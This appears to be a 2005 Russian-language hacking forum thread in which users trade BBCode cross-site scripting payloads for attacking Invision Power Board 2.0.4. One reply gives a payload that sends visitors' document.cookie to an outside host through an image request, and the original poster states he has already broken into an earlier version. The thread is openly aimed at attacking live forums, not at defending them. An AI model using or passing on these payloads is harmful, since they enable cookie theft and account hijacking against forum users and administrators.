Форумы Взлом IBP 2.0.4 через Xss

Discussion in 'Уязвимости CMS/форумов' started by Astro, 29 Nov 2005.

Thread Status:
Not open for further replies.
  1. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Решил тут попробывать впервые свои силы для взлома 2.0.4. Читав статью на вашем сайте я ломанул 2.0.0. Trial, но 2.0.4. вызвало проблему. В общем просмотрев форум я через определенное время в начале решил внедрит простой скрипт для теста. Вот он:
    HTML:
    [post=1000[topic=wj style=background:url(javascript:alert("test") ); [/topic]]
    [/post]
    В итоге получилось что, код в посте не отображаеться, но скрипт не запускаеться.
    Кто может подскажите что да как, где ошибка и если есть подкиньте какие нибудь статьи.
     
  2. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    37
    Likes Received:
    14
    Reputations:
    -2
    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Vot i vsyo ))) avtor - wj )))​
     
    #2 1251soldier, 29 Nov 2005
    Last edited: 29 Nov 2005
    2 people like this.
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    я точно не уверен но помойму форум блокирует " точнее заменяет на &quot
    оставь просто :alert()
     
    1 person likes this.
  4. Astro

    Astro Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    29
    Likes Received:
    2
    Reputations:
    3
    Спасибо всем.
     
Thread Status:
Not open for further replies.